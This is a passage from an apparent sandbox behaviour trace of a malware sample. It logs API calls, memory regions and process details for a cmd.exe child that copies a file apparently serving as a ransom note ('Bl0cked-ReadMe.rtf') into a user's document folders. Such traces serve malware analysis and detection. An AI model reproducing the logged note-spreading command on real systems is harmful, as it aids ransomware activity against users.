hFindFile=0x220e50, lpFindFileData=0x1ef044 | out: lpFindFileData=0x1ef044) returned 0 [0142.341] GetLastError () returned 0x12 [0142.341] FindClose (in: hFindFile=0x220e50 | out: hFindFile=0x220e50) returned 1 [0142.341] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0142.548] _close (_FileHandle=3) returned 0 [0142.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.548] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0142.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.548] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0142.548] _get_osfhandle (_FileHandle=0) returned 0x3 [0142.548] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0142.548] SetConsoleInputExeNameW () returned 0x1 [0142.548] GetConsoleOutputCP () returned 0x1b5 [0142.549] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0142.549] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.549] exit (_Code=0) Process: id = "153" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16180" os_pid = "0x728" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14556 start_va = 0x10000 end_va = 
0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14557 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14558 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14559 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14560 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14561 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14562 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14563 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14564 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 14565 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15714 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15715 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" 
filename = "" Region: id = 15716 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15717 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 15718 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 15719 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15720 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15721 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15722 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15723 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15724 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15725 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 
region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15726 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15727 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15728 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 15729 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15730 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 15731 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 15732 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 15733 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 15734 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 15735 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 15736 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000580000" filename = "" Region: id = 15737 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 209 os_tid = 0x110 [0140.514] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efa3c | out: lpSystemTimeAsFileTime=0x1efa3c*(dwLowDateTime=0x8daf36e0, dwHighDateTime=0x1d440a9)) [0140.514] GetCurrentProcessId () returned 0x728 [0140.514] GetCurrentThreadId () returned 0x110 [0140.514] GetTickCount () returned 0x2c1c8 [0140.514] QueryPerformanceCounter (in: lpPerformanceCount=0x1efa34 | out: lpPerformanceCount=0x1efa34*=19730337982) returned 1 [0140.523] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0140.523] __set_app_type (_Type=0x1) [0140.523] __p__fmode () returned 0x76b331f4 [0140.523] __p__commode () returned 0x76b331fc [0140.523] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0140.523] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0140.523] GetCurrentThreadId () returned 0x110 [0140.523] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x110) returned 0x38 [0140.523] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.523] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0140.523] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.524] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.524] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ef9cc | out: phkResult=0x1ef9cc*=0x0) returned 0x2 [0140.524] VirtualQuery (in: lpAddress=0x1efa03, lpBuffer=0x1ef99c, dwLength=0x1c | out: lpBuffer=0x1ef99c*(BaseAddress=0x1ef000, 
AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.524] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1ef99c, dwLength=0x1c | out: lpBuffer=0x1ef99c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.524] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1ef99c, dwLength=0x1c | out: lpBuffer=0x1ef99c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.524] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1ef99c, dwLength=0x1c | out: lpBuffer=0x1ef99c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.524] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1ef99c, dwLength=0x1c | out: lpBuffer=0x1ef99c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.524] GetConsoleOutputCP () returned 0x1b5 [0140.524] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.524] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0140.524] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.524] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.525] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.525] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.525] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.525] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.525] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.525] 
SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.525] GetEnvironmentStringsW () returned 0x380198* [0140.526] FreeEnvironmentStringsW (penv=0x380198) returned 1 [0140.526] GetEnvironmentStringsW () returned 0x380198* [0140.526] FreeEnvironmentStringsW (penv=0x380198) returned 1 [0140.526] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee93c | out: phkResult=0x1ee93c*=0x40) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0xc0, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x1, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0x1, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x0, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x40, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x40, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0x40, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.526] RegCloseKey (hKey=0x40) returned 0x0 [0140.526] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee93c | out: phkResult=0x1ee93c*=0x40) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0x40, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x1, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.526] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0x1, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.527] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x0, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.527] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x9, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.527] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x4, lpData=0x1ee948*=0x9, lpcbData=0x1ee940*=0x4) returned 0x0 [0140.527] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee944, lpData=0x1ee948, 
lpcbData=0x1ee940*=0x1000 | out: lpType=0x1ee944*=0x0, lpData=0x1ee948*=0x9, lpcbData=0x1ee940*=0x1000) returned 0x2 [0140.527] RegCloseKey (hKey=0x40) returned 0x0 [0140.527] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636f [0140.527] srand (_Seed=0x5b88636f) [0140.527] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0140.527] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0140.527] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.527] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3818f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0140.528] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.528] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.528] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.528] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.528] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.528] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.528] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.528] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.528] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 
[0140.528] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.528] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.528] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.528] GetEnvironmentStringsW () returned 0x3822e8* [0140.528] FreeEnvironmentStringsW (penv=0x3822e8) returned 1 [0140.528] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.528] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.528] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.528] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.528] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.528] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.528] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.528] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.528] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.528] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.529] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef708 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.529] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef708, lpFilePart=0x1ef704 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef704*="Desktop") returned 0x18 [0140.529] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.529] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef484 | out: lpFindFileData=0x1ef484) returned 0x380028 [0140.529] FindClose (in: hFindFile=0x380028 | out: hFindFile=0x380028) returned 1 [0140.529] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef484 | 
out: lpFindFileData=0x1ef484) returned 0x380028 [0140.529] FindClose (in: hFindFile=0x380028 | out: hFindFile=0x380028) returned 1 [0140.529] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef484 | out: lpFindFileData=0x1ef484) returned 0x380028 [0140.529] FindClose (in: hFindFile=0x380028 | out: hFindFile=0x380028) returned 1 [0140.530] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0140.530] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0140.530] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0140.530] GetEnvironmentStringsW () returned 0x382b08* [0140.530] FreeEnvironmentStringsW (penv=0x382b08) returned 1 [0140.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.530] GetConsoleOutputCP () returned 0x1b5 [0140.531] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.531] GetUserDefaultLCID () returned 0x409 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef848, cchData=128 | out: lpLCData="0") returned 2 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef848, cchData=128 | out: lpLCData="0") returned 2 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef848, cchData=128 | out: lpLCData="1") returned 2 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | 
out: lpLCData="Tue") returned 4 [0140.531] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0140.532] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0140.532] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.533] GetConsoleTitleW (in: lpConsoleTitle=0x3708f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.533] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0140.533] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0140.533] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0140.533] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0140.534] _wcsicmp (_String1="type", _String2=")") returned 75 [0140.534] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0140.534] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0140.534] _wcsicmp (_String1="IF", _String2="type") returned -11 [0140.534] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0140.534] _wcsicmp (_String1="REM", _String2="type") returned -2 [0140.534] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0140.539] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0140.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.539] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.539] GetFileType (hFile=0x7) returned 0x2 [0140.970] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0140.970] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ef740 | out: lpMode=0x1ef740) returned 1 [0140.970] _dup (_FileHandle=1) returned 3 [0140.971] _close (_FileHandle=1) returned 0 [0140.971] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0140.971] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1ef710, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0140.972] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0140.972] GetConsoleTitleW (in: lpConsoleTitle=0x1ef540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.972] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0140.972] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0140.972] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0140.972] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0140.973] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0140.973] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1ef0a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ef0a4) returned 0x370e90 [0140.974] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0140.974] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0140.974] GetFileAttributesW 
